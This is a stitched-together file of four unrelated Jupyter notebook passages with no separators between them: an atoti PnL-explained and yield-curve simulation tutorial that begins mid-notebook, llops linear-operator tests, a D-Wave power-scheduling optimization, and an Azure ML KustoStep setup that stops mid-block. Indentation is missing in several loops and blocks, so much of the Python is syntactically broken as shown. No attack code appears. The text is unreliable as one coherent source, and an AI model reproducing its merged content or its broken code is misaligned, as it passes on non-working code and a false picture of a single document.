We derive our Delta by applying `sensi.SUM` to the [notional](https://www.investopedia.com/terms/n/notionalvalue.asp). We then apply Delta to the change in yield to get the price impact:
$\text{Theoretical PnL} = \text{Delta} \times \text{Yield Change}$
We will aggregate the *Theoretical PnL* over the levels listed in the scope below as we will be exploring the measure over these levels.
Notice that we are using the `effective last` measure here to compute the delta.
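The aggregation can be sketched in plain Python to make the formula concrete (illustrative numbers only; in the notebook the measure is computed by atoti across the cube's levels):

```python
def theoretical_pnl(positions):
    """Sum sensi * (effective last - start of day) * notional over all positions."""
    return sum(
        p["sensi"] * (p["last"] - p["start_of_day"]) * p["notional"]
        for p in positions
    )

# Two hypothetical positions: rates moved +5 bps and -2 bps respectively.
positions = [
    {"sensi": 0.5, "last": 0.0125, "start_of_day": 0.0120, "notional": 1_000_000},
    {"sensi": -0.2, "last": 0.0110, "start_of_day": 0.0112, "notional": 500_000},
]
print(round(theoretical_pnl(positions), 2))  # → 270.0
```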
```
m["Theoretical PnL"] = tt.agg.sum(
m["sensi.SUM"]
* (m["effective last"] - m["start_of_day.VALUE"])
* m["notional.SUM"],
scope=tt.scope.origin(
lvl["currency"],
lvl["curve"],
lvl["tenor"],
lvl["book_id"],
lvl["instrument_code"],
),
)
```
### Adding new multi-level hierarchy for portfolio structure
Based on the data that are of interest to the [Buy-Side](https://www.investopedia.com/terms/b/buyside.asp) and [Sell-Side](https://www.investopedia.com/terms/s/sellside.asp), we are going to see how we can structure hierarchies to facilitate the navigation of data in a cube.
#### Asset Management : Buy-Side
*Buy-Side* purchases stocks, securities and other financial products, according to the needs and strategy of a portfolio.
It would make data navigation more intuitive to create an *Investment Portfolio Hierarchy* that has Asset Class, Sub Asset Class, Fund and Portfolio as levels.
We would be able to have a global view over the Asset Class level.
If we needed more granular information, we could easily drill-down to the Sub Asset class, Fund and all the way down to the portfolio holding the Asset.
```
h["Investment Portfolio Hierarchy"] = {
"Asset Class": cube.levels["asset_class"],
"Sub Asset Class": cube.levels["sub_asset_class"],
"Fund": cube.levels["fund"],
"Portfolio": cube.levels["portfolio"],
}
```
#### Investment Banks : Sell-Side
The *Sell-Side* helps companies raise debt and equity capital and then sells those securities to the *Buy-Side*. \
The *Sell-Side* is therefore interested in having a global view over each *Business Unit*, such as Rates & Credit, Forex, Equity, etc.
They can then drill down to the *Sub Business Unit* to see its performance, then to the *Trading Desk* and all the way down to the *Book* level.
```
h["Trading Book Hierarchy"] = {
"Business Unit": lvl["business_unit"],
"Sub Business Unit": lvl["sub_business_unit"],
"Trading Desk": lvl["trading_desk"],
"Book": lvl["book"],
}
```
### Explore the Theoretical PnL by Investment Portfolio Hierarchy
We shall explore the Theoretical PnL from the Buy-Side perspective.
Let's visualize the data in a chart to see the spread of the *Theoretical PnL* across the funds for each *Asset Class*.
```
session.visualize("Theoretical PnL spread across funds")
```
In the next 2 visualizations, we shall see the impact of having the *Investment Portfolio Hierarchy*.
In the first tree map, we perform a split at the *portfolio* level from *Investment Portfolio Hierarchy*. This means that we are drilling down from the Asset class to Sub Asset Class, Fund and then to the Portfolio level. E.g. we will see the portfolio HE01 under the Asset Class *Rates & Credit* and *Forex*.
```
session.visualize("Investment Portfolio concentration")
```
In this second tree map, we perform a split at the *portfolio* hierarchy.
Hence we will only see the collective *Theoretical PnL* of the portfolio. E.g. we will only see 1 HE01 in this map.
```
session.visualize("Portfolio concentration")
```
In the below pivot-table, we can easily drill-down the levels in the *Investment Portfolio Hierarchy* to see measures at granular levels.
Naturally, this could also be achieved by clicking on `>+` and manually adding a hierarchy to drill down to. It's just a little more tedious.
```
session.visualize("Investment Portfolio Hierarchy Pivot Table")
```
#### Yield Curve
The *Yield Curve* gives insights to the future interest rate changes and economic activity.
A normal yield curve slopes upward: longer-term bonds have higher yields than short-term ones. Short-term interest rates are the lowest because they embed less inflation risk. This signals economic expansion.
An inverted curve slopes downward and is a sign of an upcoming recession: shorter-term bonds yield more than longer-term ones.
A flat or humped yield curve shows that the yields for shorter- and longer-term bonds are very close to each other. Investors expect interest rates to remain about the same, which usually accompanies an economic transition.
We will use the start of day and last rates against the tenor to plot our yield curve. We should be able to see a normal upward yield curve in the chart below.
```
session.visualize("Yield Curve")
```
We see that *Rates & Credit* has the highest *Theoretical PnL* among the Asset class.
```
session.visualize("Theoretical PnL")
```
By applying sensitivity against the Asset Class and Currency, we can see that the 3 peaks are in the order of *Rates & Credit, EUR*, *Forex, EUR* and lastly *Equity, EUR*.
```
session.visualize("Risk Map")
```
### What-ifs using Parameter simulations
We will run simulations to see the impact of shifts in curves:
- Parallel Shift
- Curve Inversion
- Curve Inversion Stress
#### Shift Simulation
A parallel shift in the yield curve happens when the interest rates on all fixed-income maturities increase or decrease by the same number of basis points.
The curve does not change but it shifts to the left or to the right. This is most common when the yield curve is upward sloping.
This simulation is important for investors who might liquidate their positions before maturity, as the shift can cause bond prices to fluctuate substantially.
Investors could mitigate this risk by reducing the bond duration, alleviating the volatility.
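As a rough sketch of why duration matters (a first-order approximation with hypothetical numbers, not part of the notebook's data): a bond's relative price change is approximately minus its duration times the yield shift, so halving duration halves the impact of a parallel shift.

```python
def price_change_pct(duration: float, yield_shift: float) -> float:
    """First-order (duration-only) estimate of a bond's relative price change."""
    return -duration * yield_shift

# A +10 bps (0.001) parallel shift:
print(price_change_pct(8.0, 0.001))  # long-duration bond: about -0.8%
print(price_change_pct(2.0, 0.001))  # short-duration bond: about -0.2%
```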
Earlier, we have created the parameter simulation `curve_simulation`.
We will use it to simulate parallel shift in yield curve by applying a negative 10 [bps](https://www.investopedia.com/ask/answers/what-basis-point-bps/) shift on the last rate for Euro currency on all Tenor.
```
curve_simulation += ("Curve Parallel Shift", None, "EUR", -0.001)
```
The above snippet creates a scenario `Curve Parallel Shift`, followed by the levels that are affected by this simulation and the value of `last parameter`.
`None` is a wildcard value, indicating that it will affect all the tenors.
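The wildcard behavior can be sketched in plain Python (a simplified stand-in for illustration, not atoti's actual implementation):

```python
def apply_scenario(curve, tenor, currency, bump):
    """Add `bump` to every (tenor, currency) point matched by the scenario.

    A `None` tenor or currency acts as a wildcard matching every value of that level.
    """
    return {
        (t, c): rate + (bump if tenor in (None, t) and currency in (None, c) else 0.0)
        for (t, c), rate in curve.items()
    }

curve = {("1Y", "EUR"): 0.010, ("5Y", "EUR"): 0.015, ("5Y", "USD"): 0.020}
shifted = apply_scenario(curve, tenor=None, currency="EUR", bump=-0.001)
# Both EUR points move by -10 bps; the USD point is unchanged.
print(shifted)
```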
##### Explore Curve Parallel Shift scenario impact on Theoretical PnL
We see that while the curve retains its shape, all the data points moved to the right of the graph.
```
session.visualize("Yield Curve Curve Parallel Shift")
```
Let's now go into the investment portfolio to see the impact of this shift on the *Theoretical PnL*. \
We see the *Theoretical PnL* went negative on a 10bps shift, with *Rates & Credit* suffering the most loss.
```
session.visualize("Theoretical PnL Parallel Shift - Investment Portfolio")
```
#### Curve Inversion Simulation
An inverted yield curve is a predictor of economic recession as it implies that interest rates are going to fall. In fact, recessions usually cause interest rates to fall.
Yields on short-term bills are expected to plummet if a recession is coming, since the Federal Reserve lowers the fed funds rate when the economy slows down. Investors seeking a safe investment may therefore avoid Treasurys with maturities of less than two years. This dampens demand for those bills and sends their yields up, while higher demand for longer-term instruments lowers their yields; hence an inverted curve occurs.
Let's run another simulation on the currency EUR and see the impact on the *Theoretical PnL*.
We will set `last parameter` to a negative 20bps for the currency EUR for tenors 5Y and above and observe the change in the curve shape.
```
curve_simulation += ("Curve Inversion", "5Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "6Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "7Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "8Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion", "9Y", "EUR", -0.002)
```
##### Explore Curve Inversion scenario impact on Theoretical PnL
We see a slight inversion in the curve from the tenor 4Y to 5Y before it becomes a shift to the right, as in the case of a parallel shift.
In this case, we predict that the yields will dip for instruments with more than 5Y maturity.
```
session.visualize("Yield Curve Inversion")
```
As expected, we can see drastic drop in the *Theoretical PnL* across all the asset classes, the greatest loss incurred in the asset class *Rates & Credit*.
```
session.visualize("Theoretical PnL Curve Inversion")
session.visualize("Theoretical PnL against Tenor")
```
#### Curve Inversion Stress Simulation
We will create a new scenario where we stress the curve further by assuming further drops in rates for the longer-term instruments.
```
curve_simulation += ("Curve Inversion Stress", "5Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion Stress", "6Y", "EUR", -0.002)
curve_simulation += ("Curve Inversion Stress", "7Y", "EUR", -0.004)
curve_simulation += ("Curve Inversion Stress", "8Y", "EUR", -0.004)
curve_simulation += ("Curve Inversion Stress", "9Y", "EUR", -0.004)
```
##### Explore Curve Inversion Stress scenario impact on Theoretical PnL
We see the curve is starting to slope more downward.
```
session.visualize("Yield Curve Inversion Stress")
```
We see the downward slope dipped further in the stress scenario.
```
session.visualize("Theoretical PnL Curve Inversion Stress")
session.visualize("Scenarios Comparison")
```
### Build Your Standalone App using atoti UI:
* Publish Yield Curve and PnL Views
* Add Page Quick filters
* Compare scenarios
* Save Dashboards
You can access atoti UI with the link below:
```
session.link()
```
We can publish the visualizations above as widgets to atoti UI. Click on *Open App* when you have published all the widgets of interest.
<img src="https://data.atoti.io/notebooks/pnl-explained/publish_widget.gif" alt="publish widget" style="zoom:40%;" />
We can quickly put together a PnL Explained dashboard.
<img src="https://data.atoti.io/notebooks/pnl-explained/dashboarding.gif" alt="dashboard design" style="zoom:40%;" />
Access the above dashboard with the link provided below:
```
session.link(path="/#/dashboard/223")
```
<div style="text-align: center;" ><a href="https://www.atoti.io/?utm_source=gallery&utm_content=pnl-explained" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover-try.png" alt="Try atoti"></a></div>
```
%matplotlib notebook
%load_ext autoreload
%autoreload 2
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import scipy.misc as misc
import math
import imageio
import llops.operators as ops
import llops as yp
from llops import vec
global_backend = 'numpy' # arrayfire or numpy
global_dtype = 'complex32' # complex32 or complex64
ops.setDefaultBackend(global_backend)
ops.setDefaultDatatype(global_dtype)
# Image to use when generating object
object_file_name = '../test/brain_to_scan.png'
# Color channel to use when generating object
object_color_channel = 2
# Image size to simulate
image_size = np.array([32, 64])
# Determine machine precision threshold
eps = yp.precision(global_dtype) * np.prod(image_size)
# Load object and crop to size
x_0 = yp.simulation.brain(image_size)
# Convert object to global default backend
x = yp.changeBackend(x_0)
# Generate convolution kernel h
h_size = np.array([4, 4])
h = yp.zeros(image_size, global_dtype, global_backend)
h[image_size[0] // 2 - h_size[0] // 2:image_size[0] // 2 + h_size[0] // 2,
image_size[1] // 2 - h_size[1] // 2:image_size[1] // 2 + h_size[1] // 2] = yp.randn((h_size[0], h_size[1]), global_dtype, global_backend)
h /= yp.scalar(yp.sum(yp.abs(h)))
C = ops.Convolution(h, pad_value='mean')
A = C
y = A * x
# Show object and h
plt.figure(figsize=(11,3))
plt.subplot(141)
plt.imshow(yp.abs(yp.changeBackend(x_0, 'numpy')))
plt.title('Object (x)')
plt.subplot(142)
plt.imshow(yp.abs(np.asarray(h)))
plt.title('h')
plt.subplot(143)
plt.imshow((yp.abs(np.asarray(y))))
plt.title('Measurement (h * x)');
plt.subplot(144)
plt.imshow((yp.abs(np.asarray(A.inv * y))))
plt.title('Inversion');
```
## Crop Outside of FOV
```
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0),pad_value='mean')
CR.arguments = {'crop_offset': (-1,-10)}
x_crop = CR * x
plt.figure()
plt.subplot(121)
plt.imshow(yp.abs(CR * x))
plt.subplot(122)
plt.imshow(yp.abs(CR.H * CR * x))
```
## Pad Outside FOV
```
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0))
CR.arguments = {'crop_offset': (2,33)}
x_crop = CR * x
CR.H * x_crop
crop_size = (32, 32)
CR = ops.Crop(image_size, crop_size, crop_start=(0,0))
CR.arguments = {'crop_offset': (2,33)}
x_crop = CR * x
plt.figure()
plt.subplot(121)
plt.imshow(yp.abs(CR * x))
plt.subplot(122)
plt.imshow(yp.abs(CR.H * CR * x))
```
## Make Convolution Smarter
Helper functions required:
- isDeltaFunction: takes an array, determines whether it is a delta function, and gets its position
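A possible numpy sketch of such a helper (an illustrative guess, not the llops implementation):

```python
import numpy as np

def is_delta_function(arr, tol=1e-12):
    """Return (True, position) if `arr` has exactly one nonzero entry, else (False, None)."""
    nonzero = np.argwhere(np.abs(np.asarray(arr)) > tol)
    if len(nonzero) == 1:
        return True, tuple(int(i) for i in nonzero[0])
    return False, None

kernel = np.zeros((5, 5))
kernel[2, 3] = 1.0
print(is_delta_function(kernel))  # → (True, (2, 3))
```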
```
sz = yp.shape(x)
kernel = yp.zeros(sz)
# kernel[50,50] = 10
kernel[20,21] = 1
# kernel[20,31] = 0.5
C1 = ops.Convolution(kernel, force_full_convolution=True)
C2 = ops.Convolution(kernel)
print(C1)
print(C2)
plt.figure(figsize=(11,4))
plt.subplot(131)
plt.imshow(yp.abs(x))
plt.colorbar()
plt.subplot(132)
plt.imshow(yp.abs(C1 * x))
plt.colorbar()
plt.subplot(133)
plt.imshow(yp.abs(C2 * x))
plt.colorbar()
print(yp.amax(x))
print(yp.amax(yp.abs(C1 * x)))
print(yp.amax(yp.abs(C2 * x)))
np.sum(np.abs(C1 * x - C2 * x))
```
## Add Inner-Operators to Convolution
This will be removed if the operator is broken up
```
# Define inputs and operators first (these notebook cells were out of execution order)
s0 = yp.zeros((2, 1))
s1 = yp.ones((2, 1)) * 10
H = ops.PhaseRamp(image_size)
F = ops.FourierTransform(image_size, center=True, pad=True)
C = ops.Convolution(s0, inside_operator=F.H * H, mode='circular')
yp.where(F.H * H * s1)
C = ops.Convolution(s1, inside_operator=F.H * H, mode='circular', force_full=False)
C2 = ops.Convolution(s1, inside_operator=F.H * H, mode='circular', force_full=True)
C.arguments = {'kernel': s1}
plt.figure(figsize=(11,3))
plt.subplot(121)
plt.imshow(yp.abs(C2.inv * x))
plt.subplot(122)
plt.imshow(yp.abs(C.inv * x))
```
## Inverting Single Operators
```
F = ops.FourierTransform(h.shape)
A = F.H * ops.Diagonalize((F * h), inverse_regularizer=1e-10) * F
y = A * x
yp.abs(A.inv * y)
plt.figure(figsize=(12,4))
plt.subplot(131)
plt.imshow(yp.abs(x))
plt.colorbar()
plt.subplot(132)
plt.imshow(yp.abs(y))
plt.colorbar()
plt.subplot(133)
plt.imshow(yp.abs(A.inv * y))
plt.colorbar()
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse
V = ops.Vstack(operators)
assert all(yp.vec(V.inv * (V * x)) == vec(x))
# Check gradient
V.gradient_check()
# Print latex
V.latex()
V.latex(gradient=True)
```
## Vertical Stacking and Inverses
```
print(V.is_stack)
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Applying Offsets to Crop Operators
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Set crop offsets
args = operators[1].arguments
args['crop_offset'] = (0,10)
operators[1].arguments = args
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Applying Offsets to Stacked Crop Operators After Formation
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators, normalize=False)
# Set crop offsets
args = V.arguments
args[1]['crop_offset'] = (0,10)
V.arguments = args
# Plot
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(V * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(V.H * V * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(V.inv * V * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Speed Optimization For Crop Operators
```
crop_size = (32, 32)
operators = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Check inverse calculation
V = ops.Vstack(operators)
y = V * x
yy = yp.zeros(V.stack_operators[0].M)
%timeit V.stack_operators[0].H * yy + V.stack_operators[1].H * yy + V.stack_operators[2].H * yy
%timeit sum([V.stack_operators[i].H * y[V.idx[i]:V.idx[i + 1], :] for i in range(V.nops)])
%timeit V.H * y
```
## Inverting Diagonalized Operators
```
# Convolution operators
c = ops.Convolution(h, inverse_regularizer=0)
conv_ops = [c] * 3
# Create operators
C = ops.Dstack(conv_ops)
# Create measurements
x3 = ops.VecStack([x] * 3)
# Composite Operator
y = C * x3
C.latex()
# Perform inversion
x_star = C.inv * y
# Show results
plt.figure(figsize=(14,4))
plt.subplot(141)
plt.imshow(yp.abs(x3))
plt.title('$x$')
plt.colorbar()
plt.subplot(142)
plt.imshow(yp.abs(C * x3))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(143)
plt.imshow(yp.abs(C.H * C * x3))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(144)
plt.imshow(yp.abs(C.inv * C * x3))
plt.title('$A^{-1} A x$')
plt.colorbar()
```
## Combining Crops and Convolution Operators for Inversion
```
# Crop operations
crop_ops = [ops.Crop(image_size, crop_size, crop_start=(0,0)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 4)),
ops.Crop(image_size, crop_size, crop_start=(0,image_size[1] // 2))]
# Convolution operators
h_crop = crop_ops[1] * h  # alternatively: yp.rand(h.shape)
conv_ops = [ops.Convolution(h_crop, inverse_regularizer=0)] * 3
# Create operators
C = ops.Dstack(conv_ops)
X = ops.Vstack(crop_ops)
# Composite Operator
A = C * X
y = A * x
A.latex()
# Perform inversion
x_star = A.inv * y
# Show results
plt.figure(figsize=(14,4))
plt.subplot(151)
plt.imshow(yp.abs(x))
plt.title('$x$')
plt.colorbar()
plt.subplot(152)
plt.imshow(yp.abs(A * x))
plt.title('$Ax$')
plt.colorbar()
plt.subplot(153)
plt.imshow(yp.abs(A.H * A * x))
plt.title('$A^H A x$')
plt.colorbar()
plt.subplot(154)
plt.imshow(yp.abs(A.inv * A * x))
plt.title('$A^{-1} A x$')
plt.colorbar()
plt.subplot(155)
plt.imshow(yp.abs(A.inv * A * x - x))
plt.title('$A^{-1} A x - x$')
plt.colorbar()
```
## Operator inside Diagonalize
```
# Create phase ramp to diagonalize
H = ops.PhaseRamp(image_size)
s = yp.rand((2,1))
# Create diagonalized phase ramp operator
D = ops.Diagonalize(s, inside_operator=H)
# Check that inside operator is set correctly
assert yp.sum(yp.abs(D * x - ((H * s) * x))) == 0.0
# Check gradient
D.gradient_check()
# Render Latex
D.latex()
```
## Equality Testing
```
D1 = ops.Diagonalize(h)
D_eq = ops.Diagonalize(h)
D_neq = ops.Diagonalize(yp.zeros_like(h))
# Ensure equality is correct
assert D1 == D_eq
# Ensure inequality is correct
assert not D1 == D_neq
F = ops.FourierTransform(image_size, center=True)
F_neq = ops.FourierTransform(image_size, center=False)
F_eq = ops.FourierTransform(image_size, center=True)
assert F == F_eq
assert not F == F_neq
assert F == F_eq
assert not F == F_neq
```
# Larger network power optimization with realistic scenarios for renewable energy sources
```
import pandas as pd
import warnings
import numpy as np
from dwave.system.samplers import LeapHybridSampler, DWaveSampler
from dimod import BinaryQuadraticModel, ExactSolver
from dwave.system.composites import EmbeddingComposite
from neal import SimulatedAnnealingSampler
from datetime import datetime as dt
from matplotlib import pyplot as plt
from src.utils.BQM import multisource_plot
import dimod
```
# Input Data
The input data for the demand is the same as used in the main notebook.
## Power Demand
Here we use real data sets from the sources below to test our algorithm. We import the hour by hour load and generation cost data for Italy in 2014.
Power Demand: https://www.entsoe.eu/data/data-portal/
Generation Costs: https://www.eia.gov/electricity/annual/html/epa_08_04.html
```
IT_data = pd.read_excel('./data/Monthly-hourly-load-values_2014_IT.xlsx')
demand = []
for i in range(len(IT_data)):
demand += list((IT_data.iloc[i,6:30]))
```
## Renewable energy production
The production of renewables such as solar and wind power comes with a variability that is important to model in these types of simulations. We can model this with a coefficient called a capacity factor. The capacity factor tells us at what percentage of its maximum output a plant is producing during any specific hour of the day.
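For example, the hourly output of a plant is simply its maximum output scaled by that hour's capacity factor. A minimal sketch with assumed, illustrative numbers (not taken from the dataset):

```python
# Illustrative only: the numbers below are assumptions, not dataset values.
max_output_mw = 100.0              # assumed maximum plant output in MW
capacity_factor = 0.8              # e.g. a sunny mid-morning hour
hourly_output_mw = max_output_mw * capacity_factor
print(hourly_output_mw)            # 80.0 MW produced during that hour
```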
### Variability of Solar Power
The [**duck curve**](https://en.wikipedia.org/wiki/Duck_curve) is a graph of power production over the course of a day that shows the timing imbalance between peak demand and renewable energy production. Clearly, for solar energy, more solar power is generated when the sun is out.
We model this with a set of capacity factors that approach 1 during daylight hours and tend to 0 during the night hours.
```
# Solar Production capacity factors over a day
solar_capacity_factors = [0,0,0,0,0,0,0.02,0.14,0.64,0.8,0.93,0.96,0.98,0.99,0.99,0.96,0.66,0.26,0.02,0,0,0,0,0]
plt.plot(solar_capacity_factors[0:24], label='demand')
plt.xlabel('Hours of the day')
plt.title('Solar Capacity Factors')
plt.show()
```
### Variability of Wind Power
Wind power is intrinsically stochastic. Such stochasticity can be modeled by adding a volatile (random) component to the capacity factors. Here we use a 50% baseline capacity factor plus a random component of up to 25%, modeling the wind blowing more or less strongly.
```
# Variable wind capacity factors over a day
wind_capacity_factors = []
for i in range(24):
    wind_var = 0.5 * np.random.random()  # accounts for variance of the wind
wind_capacity_factors.append(0.5 + 0.5*wind_var)
plt.plot(wind_capacity_factors[0:24], label='demand')
plt.xlabel('Hours of the day')
plt.title('Wind Capacity Factors')
plt.show()
```
## Plant Operating Cost
In this section we consider six categories of power generation:
Nuclear, Coal, Hydro, Gas, Solar, and Wind.
We collect average operating costs for the different types of generation from the source below.
They include three numbers in mills per kWh:
operating costs, maintenance costs, and fuel costs.
https://www.eia.gov/electricity/annual/html/epa_08_04.html
### Nuclear 'n', Coal 'c', Hydro 'h', Gas 'g', Solar 's', Wind 'w'
```
#Operating costs by plant type(Operation,Maintenance,Fuel) mills per kwh
operating_costs = [('n',11.17+7.06+7.48),('c',5.16+5.41+26.70),('h',8.37+5.06),('g',2.34+2.68+28.22),('s',5.16+5.41),('w',5.16+5.41)]
sources = [operating_costs[i][0] for i in range(len(operating_costs))]
```
# Optimization
Running over one day at 24 hourly intervals.
Here we look at the effect of switching costs, emissions, and the amount of power generation.
The order of the indices corresponds to the order of the sources in the heading above.
```
np.random.seed(123)
n_schedules = 24
# define binary variables
schedules = [f's_{i}' for i in range(n_schedules)]
n_energy_sources = len(sources)
#2000 is a normalization factor scaling the total demand in Italy to the size of your problem
demand_schedule = [i/2000 for i in demand[0:n_schedules]]
#Defining capacity factors for all power sources
capacity_factors = [[1]*24 for i in range(len(sources))]
capacity_factors[4]= solar_capacity_factors
capacity_factors[5]=wind_capacity_factors
cost_usage = [operating_costs[i][1] for i in range(len(operating_costs))]
# define the cost to switch off/on one of the energy sources
# nuclear is expensive to turn on/off for example, gas can switch on quickly
cost_switch = [50, 8, 2, 1,1,1]
# define the carbon emission per kWh
#Coal and Gas have high emissions while renewables have much lower emissions
cost_emission = [0, 20, 2, 20,0,0]
#Power generation per type
#Here is the basic max power generation capacity for each type of power
power_generation = [6, 6, 3, 5,8,6]
```
# Defining our BQM
```
# define BQM
bqm = BinaryQuadraticModel(dimod.BINARY)
# add a variable for each schedule and energy source
for s in schedules:
for alpha in sources:
bqm.add_variable(s+alpha)
# Objective
# linear components
for i in range(n_schedules):
for alpha in range(n_energy_sources):
bqm.set_linear(f's_{i}'+sources[alpha], (cost_usage[alpha] + cost_emission[alpha]))
# Constraints
# Switching Constraints
for i in range(n_schedules-1):
for alpha in range(n_energy_sources):
for beta in range(n_energy_sources):
if alpha != beta:
bqm.set_quadratic(f's_{i}'+sources[alpha], f's_{i+1}'+sources[beta], cost_switch[alpha] + cost_switch[beta])
# equality constraint: total generated power must equal demand at each hour
for i in range(n_schedules):
    bqm.add_linear_equality_constraint(
        [(f's_{i}' + sources[alpha], capacity_factors[alpha][i] * power_generation[alpha]) for alpha in range(n_energy_sources)],
        constant=-demand_schedule[i],
        lagrange_multiplier=800,
    )
```
# Running the Simulation
## Leap Hybrid Solver
First we run the optimization on the Leap hybrid solver.
```
# Leap hybrid solver
sampler = LeapHybridSampler()
res = sampler.sample(bqm, time_limit=50)
#print(res.aggregate())
df = res.aggregate().to_pandas_dataframe()
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,'hybrid')
```
## Simulated Annealing
Next we test our QUBO on a simulated annealer and plot the results.
```
# Simulated annealing
classical_sampler = SimulatedAnnealingSampler()
start = dt.now()
classical_res = classical_sampler.sample(bqm,num_reads=1)
#print(classical_res.aggregate())
df = classical_res.aggregate().to_pandas_dataframe()
df=df[df.energy == df.energy.min()]
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,gtype = 'sa')
```
## Running on QPU
```
# QPU solver
sampler = EmbeddingComposite(DWaveSampler(solver='DW_2000Q_6',num_reads=1))
res = sampler.sample(bqm)
#print(res.aggregate())
df = res.aggregate().to_pandas_dataframe()
df=df[df.energy == df.energy.min()]
del df['chain_break_fraction']
multisource_plot(df,sources,power_generation,demand_schedule,capacity_factors,'qpu')
```
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.

# Azure Machine Learning Pipeline with KustoStep
To use Kusto as a compute target from [Azure Machine Learning Pipeline](https://aka.ms/pl-concept), a KustoStep is used. A KustoStep enables the functionality of running Kusto queries on a target Kusto cluster in Azure ML Pipelines. Each KustoStep can target one Kusto cluster and perform multiple queries on it. This notebook demonstrates the use of KustoStep in Azure Machine Learning (AML) Pipeline.
## Before you begin:
1. **Have an Azure Machine Learning workspace**: You will need details of this workspace later on to define KustoStep.
2. **Have a Service Principal**: You will need a service principal and use its credentials to access your cluster. See [this](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal) for more information.
3. **Have a Blob storage**: You will need an Azure Blob storage for uploading the output of your Kusto query.
## Azure Machine Learning and Pipeline SDK-specific imports
```
import os
import azureml.core
from azureml.core.runconfig import JarLibrary
from azureml.core.compute import ComputeTarget, KustoCompute
from azureml.exceptions import ComputeTargetException
from azureml.core import Workspace, Experiment
from azureml.pipeline.core import Pipeline, PipelineData
from azureml.pipeline.steps import KustoStep
from azureml.core.datastore import Datastore
from azureml.data.data_reference import DataReference
# Check core SDK version number
print("SDK version:", azureml.core.VERSION)
```
## Initialize Workspace
Initialize a workspace object from persisted configuration. If you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you go through the [configuration Notebook](https://aka.ms/pl-config) first if you haven't.
```
ws = Workspace.from_config()
print(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep = '\n')
```
## Attach Kusto compute target
Next, you need to create a Kusto compute target and give it a name. You will use this name to refer to your Kusto compute target inside Azure Machine Learning. Your workspace will be associated to this Kusto compute target. You will also need to provide some credentials that will be used to enable access to your target Kusto cluster and database.
- **Resource Group** - The resource group name of your Azure Machine Learning workspace
- **Workspace Name** - The workspace name of your Azure Machine Learning workspace
- **Resource ID** - The resource ID of your Kusto cluster
- **Tenant ID** - The tenant ID associated to your Kusto cluster
- **Application ID** - The Application ID associated to your Kusto cluster
- **Application Key** - The Application key associated to your Kusto cluster
- **Kusto Connection String** - The connection string of your Kusto cluster
```
compute_name = "<compute_name>" # Name to associate with new compute in workspace
# Account details associated to the target Kusto cluster
resource_id = "<resource_id>" # Resource ID of the Kusto cluster
kusto_connection_string = "<kusto_connection_string>" # Connection string of the Kusto cluster
application_id = "<application_id>" # Application ID associated to the Kusto cluster
application_key = "<application_key>" # Application Key associated to the Kusto cluster
tenant_id = "<tenant_id>" # Tenant ID associated to the Kusto cluster
try:
kusto_compute = KustoCompute(workspace=ws, name=compute_name)
print('Compute target {} already exists'.format(compute_name))
except ComputeTargetException:
print('Compute not found, will use provided parameters to attach new one')
